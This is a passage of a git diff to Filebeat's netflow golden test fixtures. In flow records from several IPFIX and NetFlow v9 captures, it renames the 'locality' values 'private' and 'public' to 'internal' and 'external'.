@@ -399,7 +399,7 @@ }, "source": { "ip": "0.0.0.0", - "locality": "private", + "locality": "internal", "port": 136 } }, @@ -412,7 +412,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 7451 }, "event": { @@ -428,7 +428,7 @@ }, "flow": { "id": "JhEHWMX5XwI", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -480,7 +480,7 @@ }, "source": { "ip": "185.232.29.199", - "locality": "public", + "locality": "external", "port": 55869 } }, @@ -493,7 +493,7 @@ "Fields": { "destination": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 2000 }, "event": { @@ -509,7 +509,7 @@ }, "flow": { "id": "Q_zyIhDZuIo", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -561,7 +561,7 @@ }, "source": { "ip": "177.188.228.137", - "locality": "public", + "locality": "external", "port": 9430 } }, @@ -574,7 +574,7 @@ "Fields": { "destination": { "ip": "138.44.161.13", - "locality": "public", + "locality": "external", "port": 179 }, "event": { @@ -590,7 +590,7 @@ }, "flow": { "id": "pNMKY7O9aVc", - "locality": "public" + "locality": "external" }, "netflow": { "bgp_destination_as_number": 7575, @@ -642,7 +642,7 @@ }, "source": { "ip": "138.44.161.14", - "locality": "public", + "locality": "external", "port": 33689 } }, diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json index c52420347bc9..dc8f538dfee7 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-VMware-virtual-distributed-switch.golden.json 
@@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "172.18.65.211", - "locality": "private", + "locality": "internal", "port": 5985 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "-Sv1di8xiKE", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.18.65.211", @@ -76,7 +76,7 @@ "source": { "bytes": 100, "ip": "172.18.65.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61209 } @@ -90,7 +90,7 @@ "Fields": { "destination": { "ip": "172.18.65.255", - "locality": "private", + "locality": "internal", "port": 138 }, "event": { @@ -106,7 +106,7 @@ }, "flow": { "id": "OQCLJ5IN83c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.18.65.255", @@ -159,7 +159,7 @@ "source": { "bytes": 229, "ip": "172.18.65.91", - "locality": "private", + "locality": "internal", "packets": 1, "port": 138 } @@ -173,7 +173,7 @@ "Fields": { "destination": { "ip": "172.18.65.255", - "locality": "private", + "locality": "internal", "port": 138 }, "event": { @@ -189,7 +189,7 @@ }, "flow": { "id": "OQCLJ5IN83c", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.18.65.255", @@ -242,7 +242,7 @@ "source": { "bytes": 229, "ip": "172.18.65.91", - "locality": "private", + "locality": "internal", "packets": 1, "port": 138 } @@ -256,7 +256,7 @@ "Fields": { "destination": { "ip": "224.0.0.252", - "locality": "private", + "locality": "internal", "port": 5355 }, "event": { @@ -272,7 +272,7 @@ }, "flow": { "id": "xcyYrM-QBl0", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "224.0.0.252", @@ -325,7 +325,7 @@ "source": { "bytes": 104, "ip": "172.18.65.21", - "locality": "private", + "locality": "internal", "packets": 2, "port": 61329 } @@ -353,7 +353,7 @@ }, "flow": { "id": "y_Vml2vPNtw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv6_address": "ff02::1:3", 
diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json index 1a3667d0659e..5b2b4b01ac3b 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-YAF-basic-with-applabel.golden.json @@ -8,7 +8,7 @@ "destination": { "bytes": 200, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 2, "port": 53 }, @@ -25,7 +25,7 @@ }, "flow": { "id": "QMH_S2K9KdI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.100", @@ -77,7 +77,7 @@ "source": { "bytes": 132, "ip": "172.16.32.201", - "locality": "private", + "locality": "internal", "packets": 2, "port": 46086 } @@ -92,7 +92,7 @@ "destination": { "bytes": 92, "ip": "172.16.32.215", - "locality": "private", + "locality": "internal", "packets": 2, "port": 9997 }, @@ -109,7 +109,7 @@ }, "flow": { "id": "YlvEOsG0NHc", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.32.215", @@ -167,7 +167,7 @@ "source": { "bytes": 172, "ip": "172.16.32.100", - "locality": "private", + "locality": "internal", "packets": 4, "port": 63499 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json index f996dac4c96f..0c2dbd22d5e8 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-configured-with-include_flowset_id.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { 
@@ -23,7 +23,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -94,7 +94,7 @@ "source": { "bytes": 40, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 51053 } @@ -108,7 +108,7 @@ "Fields": { "destination": { "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "port": 51053 }, "event": { @@ -124,7 +124,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.1", @@ -183,7 +183,7 @@ "source": { "bytes": 1525, "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 443 } @@ -197,7 +197,7 @@ "Fields": { "destination": { "ip": "10.0.0.1", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -213,7 +213,7 @@ }, "flow": { "id": "8wXIKNz6u_8", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.0.0.1", @@ -284,7 +284,7 @@ "source": { "bytes": 1541, "ip": "192.168.0.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 51053 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json index 9e949af09f4e..72c0db6a7904 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX-vIPtela-with-VPN-id.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "172.16.21.27", - "locality": "private", + "locality": "internal", "port": 443 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "dO-Anbp9xpw", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "172.16.21.27", 
@@ -79,7 +79,7 @@ "source": { "bytes": 775, "ip": "10.113.7.54", - "locality": "private", + "locality": "internal", "packets": 8, "port": 41717 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json index cbab38ddc971..72dd4072ef9e 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/IPFIX.golden.json @@ -45,7 +45,7 @@ "Fields": { "destination": { "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -61,7 +61,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.128", @@ -109,7 +109,7 @@ "source": { "bytes": 260, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 5, "port": 60560 } @@ -123,7 +123,7 @@ "Fields": { "destination": { "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "port": 60560 }, "event": { @@ -139,7 +139,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.1", @@ -187,7 +187,7 @@ "source": { "bytes": 1000, "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "packets": 6, "port": 22 } @@ -201,7 +201,7 @@ "Fields": { "destination": { "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "port": 35262 }, "event": { @@ -217,7 +217,7 @@ }, "flow": { "id": "ztL93_3GZNs", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.132", @@ -265,7 +265,7 @@ "source": { "bytes": 601, "ip": "192.168.253.2", - "locality": "private", + "locality": "internal", "packets": 2, "port": 53 } 
@@ -279,7 +279,7 @@ "Fields": { "destination": { "ip": "192.168.253.2", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -295,7 +295,7 @@ }, "flow": { "id": "ztL93_3GZNs", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.2", @@ -343,7 +343,7 @@ "source": { "bytes": 148, "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "packets": 2, "port": 35262 } @@ -357,7 +357,7 @@ "Fields": { "destination": { "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "port": 49935 }, "event": { @@ -373,7 +373,7 @@ }, "flow": { "id": "VANFUe1rklc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "192.168.253.132", @@ -421,7 +421,7 @@ "source": { "bytes": 5946, "ip": "54.214.9.161", - "locality": "public", + "locality": "external", "packets": 14, "port": 443 } @@ -435,7 +435,7 @@ "Fields": { "destination": { "ip": "54.214.9.161", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -451,7 +451,7 @@ }, "flow": { "id": "VANFUe1rklc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "54.214.9.161", @@ -499,7 +499,7 @@ "source": { "bytes": 2608, "ip": "192.168.253.132", - "locality": "private", + "locality": "internal", "packets": 13, "port": 49935 } @@ -513,7 +513,7 @@ "Fields": { "destination": { "ip": "10.4.36.64", - "locality": "private", + "locality": "internal", "port": 9200 }, "event": { @@ -529,7 +529,7 @@ }, "flow": { "id": "iDHwMSG6faQ", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.4.36.64", @@ -577,7 +577,7 @@ "source": { "bytes": 60, "ip": "192.168.253.130", - "locality": "private", + "locality": "internal", "packets": 1, "port": 38254 } 
@@ -591,7 +591,7 @@ "Fields": { "destination": { "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -607,7 +607,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.128", @@ -655,7 +655,7 @@ "source": { "bytes": 256, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 4, "port": 60560 } @@ -669,7 +669,7 @@ "Fields": { "destination": { "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "port": 60560 }, "event": { @@ -685,7 +685,7 @@ }, "flow": { "id": "ofdVXz7_x6E", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.1", @@ -733,7 +733,7 @@ "source": { "bytes": 1916, "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "packets": 3, "port": 22 } @@ -747,7 +747,7 @@ "Fields": { "destination": { "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "port": 22 }, "event": { @@ -763,7 +763,7 @@ }, "flow": { "id": "WgPN9s2D0jg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.128", @@ -811,7 +811,7 @@ "source": { "bytes": 168, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 2, "port": 65308 } @@ -825,7 +825,7 @@ "Fields": { "destination": { "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "port": 65308 }, "event": { @@ -841,7 +841,7 @@ }, "flow": { "id": "WgPN9s2D0jg", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.253.1", @@ -889,7 +889,7 @@ "source": { "bytes": 84, "ip": "192.168.253.128", - "locality": "private", + "locality": "internal", "packets": 1, "port": 22 } 
@@ -903,7 +903,7 @@ "Fields": { "destination": { "ip": "224.0.0.251", - "locality": "private", + "locality": "internal", "port": 5353 }, "event": { @@ -919,7 +919,7 @@ }, "flow": { "id": "PSMPOofjjVU", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "224.0.0.251", @@ -967,7 +967,7 @@ "source": { "bytes": 232, "ip": "192.168.253.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 5353 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json index baf08b855fa9..448709e5c419 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-1941-K9-release-15.1.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "62.217.193.1", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -23,7 +23,7 @@ }, "flow": { "id": "BPlkuHwo9sU", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -70,7 +70,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 37301 @@ -85,7 +85,7 @@ "Fields": { "destination": { "ip": "62.217.193.65", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -101,7 +101,7 @@ }, "flow": { "id": "-PhJhHv5gvE", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -148,7 +148,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 58411 @@ -163,7 +163,7 @@ "Fields": { "destination": { "ip": "62.217.193.1", - "locality": "public", + "locality": "external", "port": 53 }, "event": { 
@@ -179,7 +179,7 @@ }, "flow": { "id": "zTrEnrxMnjo", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -226,7 +226,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 37661 @@ -241,7 +241,7 @@ "Fields": { "destination": { "ip": "62.217.193.65", - "locality": "public", + "locality": "external", "port": 53 }, "event": { @@ -257,7 +257,7 @@ }, "flow": { "id": "G4AVpSxBAVo", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAASA==", @@ -304,7 +304,7 @@ "source": { "bytes": 75, "ip": "192.168.0.111", - "locality": "private", + "locality": "internal", "mac": "ec:1f:72:11:9f:c1", "packets": 1, "port": 60212 @@ -319,7 +319,7 @@ "Fields": { "destination": { "ip": "192.168.3.142", - "locality": "private", + "locality": "internal", "port": 37450 }, "event": { @@ -335,7 +335,7 @@ }, "flow": { "id": "2nQmjOOzSH0", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -382,7 +382,7 @@ "source": { "bytes": 964, "ip": "158.85.58.115", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 10, "port": 5222 @@ -397,7 +397,7 @@ "Fields": { "destination": { "ip": "216.58.212.195", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -413,7 +413,7 @@ }, "flow": { "id": "z7uHiA5SrD0", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAQg==", @@ -460,7 +460,7 @@ "source": { "bytes": 2748, "ip": "192.168.0.88", - "locality": "private", + "locality": "internal", "mac": "a4:d1:8c:e9:30:2c", "packets": 8, "port": 61490 @@ -475,7 +475,7 @@ "Fields": { "destination": { "ip": "192.168.0.88", - "locality": "private", + "locality": "internal", "port": 61490 }, "event": { 
@@ -491,7 +491,7 @@ }, "flow": { "id": "z7uHiA5SrD0", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -538,7 +538,7 @@ "source": { "bytes": 2023, "ip": "216.58.212.195", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 9, "port": 443 @@ -553,7 +553,7 @@ "Fields": { "destination": { "ip": "216.58.201.106", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -569,7 +569,7 @@ }, "flow": { "id": "eyNcUtWu34I", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -616,7 +616,7 @@ "source": { "bytes": 2180, "ip": "192.168.1.201", - "locality": "private", + "locality": "internal", "mac": "98:01:a7:9f:8d:5f", "packets": 9, "port": 50299 @@ -631,7 +631,7 @@ "Fields": { "destination": { "ip": "192.168.1.201", - "locality": "private", + "locality": "internal", "port": 50299 }, "event": { @@ -647,7 +647,7 @@ }, "flow": { "id": "eyNcUtWu34I", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -694,7 +694,7 @@ "source": { "bytes": 700, "ip": "216.58.201.106", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 9, "port": 443 @@ -709,7 +709,7 @@ "Fields": { "destination": { "ip": "192.168.2.118", - "locality": "private", + "locality": "internal", "port": 61353 }, "event": { @@ -725,7 +725,7 @@ }, "flow": { "id": "i7e4W23LBGg", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -772,7 +772,7 @@ "source": { "bytes": 161, "ip": "52.236.33.163", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 2, "port": 443 @@ -787,7 +787,7 @@ "Fields": { "destination": { "ip": "52.216.130.237", - "locality": "public", + "locality": "external", "port": 443 }, "event": { 
@@ -803,7 +803,7 @@ }, "flow": { "id": "ALOJ32qLh_s", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -850,7 +850,7 @@ "source": { "bytes": 1764, "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "mac": "1c:5c:f2:07:0f:2a", "packets": 21, "port": 61674 @@ -865,7 +865,7 @@ "Fields": { "destination": { "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "port": 61672 }, "event": { @@ -881,7 +881,7 @@ }, "flow": { "id": "h9s7TXaoMZw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -928,7 +928,7 @@ "source": { "bytes": 13811, "ip": "209.197.3.19", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 30, "port": 443 @@ -943,7 +943,7 @@ "Fields": { "destination": { "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "port": 61674 }, "event": { @@ -959,7 +959,7 @@ }, "flow": { "id": "ALOJ32qLh_s", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1006,7 +1006,7 @@ "source": { "bytes": 4717, "ip": "52.216.130.237", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 16, "port": 443 @@ -1021,7 +1021,7 @@ "Fields": { "destination": { "ip": "172.217.23.232", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1037,7 +1037,7 @@ }, "flow": { "id": "2GPS5gJiF8g", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1084,7 +1084,7 @@ "source": { "bytes": 2419, "ip": "192.168.0.157", - "locality": "private", + "locality": "internal", "mac": "b0:34:95:0d:d2:5d", "packets": 13, "port": 51209 @@ -1099,7 +1099,7 @@ "Fields": { "destination": { "ip": "192.168.0.157", - "locality": "private", + "locality": "internal", "port": 51209 }, "event": { 
@@ -1115,7 +1115,7 @@ }, "flow": { "id": "2GPS5gJiF8g", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1162,7 +1162,7 @@ "source": { "bytes": 5551, "ip": "172.217.23.232", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 10, "port": 443 @@ -1177,7 +1177,7 @@ "Fields": { "destination": { "ip": "192.168.3.178", - "locality": "private", + "locality": "internal", "port": 45584 }, "event": { @@ -1193,7 +1193,7 @@ }, "flow": { "id": "ughO0a0lrBw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1240,7 +1240,7 @@ "source": { "bytes": 187, "ip": "107.21.232.174", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 3, "port": 443 @@ -1255,7 +1255,7 @@ "Fields": { "destination": { "ip": "107.21.232.174", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1271,7 +1271,7 @@ }, "flow": { "id": "ughO0a0lrBw", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1318,7 +1318,7 @@ "source": { "bytes": 104, "ip": "192.168.3.178", - "locality": "private", + "locality": "internal", "mac": "dc:ef:ca:4c:da:57", "packets": 2, "port": 45584 @@ -1333,7 +1333,7 @@ "Fields": { "destination": { "ip": "95.0.145.242", - "locality": "public", + "locality": "external", "port": 2222 }, "event": { @@ -1349,7 +1349,7 @@ }, "flow": { "id": "Ie4W_7Snl8w", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -1396,7 +1396,7 @@ "source": { "bytes": 4050, "ip": "192.168.2.118", - "locality": "private", + "locality": "internal", "mac": "70:18:8b:5c:c9:b5", "packets": 72, "port": 64233 @@ -1411,7 +1411,7 @@ "Fields": { "destination": { "ip": "192.168.2.118", - "locality": "private", + "locality": "internal", "port": 64233 }, "event": { 
@@ -1427,7 +1427,7 @@ }, "flow": { "id": "Ie4W_7Snl8w", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -1474,7 +1474,7 @@ "source": { "bytes": 3719, "ip": "95.0.145.242", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 72, "port": 2222 @@ -1489,7 +1489,7 @@ "Fields": { "destination": { "ip": "23.5.100.66", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1505,7 +1505,7 @@ }, "flow": { "id": "yokq763qB0U", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1552,7 +1552,7 @@ "source": { "bytes": 1402, "ip": "192.168.0.79", - "locality": "private", + "locality": "internal", "mac": "8c:29:37:7a:28:c0", "packets": 16, "port": 54275 @@ -1567,7 +1567,7 @@ "Fields": { "destination": { "ip": "23.5.100.66", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1583,7 +1583,7 @@ }, "flow": { "id": "DCY-5ocv9ik", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1630,7 +1630,7 @@ "source": { "bytes": 1538, "ip": "192.168.0.79", - "locality": "private", + "locality": "internal", "mac": "8c:29:37:7a:28:c0", "packets": 17, "port": 54276 @@ -1645,7 +1645,7 @@ "Fields": { "destination": { "ip": "192.168.0.79", - "locality": "private", + "locality": "internal", "port": 54276 }, "event": { @@ -1661,7 +1661,7 @@ }, "flow": { "id": "DCY-5ocv9ik", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1708,7 +1708,7 @@ "source": { "bytes": 13002, "ip": "23.5.100.66", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 14, "port": 443 @@ -1723,7 +1723,7 @@ "Fields": { "destination": { "ip": "192.168.0.61", - "locality": "private", + "locality": "internal", "port": 57007 }, "event": { 
@@ -1739,7 +1739,7 @@ }, "flow": { "id": "B7rjR_940zU", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1786,7 +1786,7 @@ "source": { "bytes": 1194, "ip": "170.251.180.15", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 4, "port": 443 @@ -1801,7 +1801,7 @@ "Fields": { "destination": { "ip": "170.251.180.15", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1817,7 +1817,7 @@ }, "flow": { "id": "B7rjR_940zU", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1864,7 +1864,7 @@ "source": { "bytes": 682, "ip": "192.168.0.61", - "locality": "private", + "locality": "internal", "mac": "90:61:ae:76:e5:e9", "packets": 2, "port": 57007 @@ -1879,7 +1879,7 @@ "Fields": { "destination": { "ip": "74.119.119.84", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -1895,7 +1895,7 @@ }, "flow": { "id": "0RrmR_QtH34", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -1942,7 +1942,7 @@ "source": { "bytes": 1804, "ip": "192.168.3.34", - "locality": "private", + "locality": "internal", "mac": "1c:5c:f2:07:0f:2a", "packets": 11, "port": 61694 @@ -1957,7 +1957,7 @@ "Fields": { "destination": { "ip": "192.168.3.142", - "locality": "private", + "locality": "internal", "port": 59459 }, "event": { @@ -1973,7 +1973,7 @@ }, "flow": { "id": "O1-Y9rjVH2A", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -2020,7 +2020,7 @@ "source": { "bytes": 4774, "ip": "185.60.218.19", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 9, "port": 443 @@ -2035,7 +2035,7 @@ "Fields": { "destination": { "ip": "185.60.218.15", - "locality": "public", + "locality": "external", "port": 443 }, "event": { 
@@ -2051,7 +2051,7 @@ }, "flow": { "id": "CtFBGbTcLpg", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -2098,7 +2098,7 @@ "source": { "bytes": 135, "ip": "192.168.3.200", - "locality": "private", + "locality": "internal", "mac": "18:20:32:bb:1d:62", "packets": 2, "port": 64493 @@ -2113,7 +2113,7 @@ "Fields": { "destination": { "ip": "192.168.3.200", - "locality": "private", + "locality": "internal", "port": 64493 }, "event": { @@ -2129,7 +2129,7 @@ }, "flow": { "id": "CtFBGbTcLpg", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAEA==", @@ -2176,7 +2176,7 @@ "source": { "bytes": 135, "ip": "185.60.218.15", - "locality": "public", + "locality": "external", "mac": "00:23:04:18:ef:40", "packets": 2, "port": 443 @@ -2191,7 +2191,7 @@ "Fields": { "destination": { "ip": "169.45.214.246", - "locality": "public", + "locality": "external", "port": 5222 }, "event": { @@ -2207,7 +2207,7 @@ }, "flow": { "id": "lT_guTKc7y4", - "locality": "public" + "locality": "external" }, "netflow": { "application_id": "BQAAAQ==", @@ -2254,7 +2254,7 @@ "source": { "bytes": 194, "ip": "192.168.0.95", - "locality": "private", + "locality": "internal", "mac": "a0:39:f7:4d:49:d5", "packets": 3, "port": 35053 diff --git a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json index 5e8efb3e6268..24970903c84d 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/Netflow-9-Cisco-ASA-2.golden.json @@ -8,7 +8,7 @@ "destination": { "bytes": 763, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -24,7 +24,7 @@ }, "flow": { "id": "UTkRrDbrhnI", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", 
@@ -75,7 +75,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61775 } }, @@ -89,7 +89,7 @@ "destination": { "bytes": 6207, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -105,7 +105,7 @@ }, "flow": { "id": "WQVc0v7217I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -156,7 +156,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61776 } }, @@ -170,7 +170,7 @@ "destination": { "bytes": 6207, "ip": "192.168.0.17", - "locality": "private", + "locality": "internal", "port": 80 }, "event": { @@ -186,7 +186,7 @@ }, "flow": { "id": "WQVc0v7217I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "192.168.0.17", @@ -237,7 +237,7 @@ "source": { "bytes": 81, "ip": "192.168.0.2", - "locality": "private", + "locality": "internal", "port": 61776 } }, @@ -251,7 +251,7 @@ "destination": { "bytes": 9075, "ip": 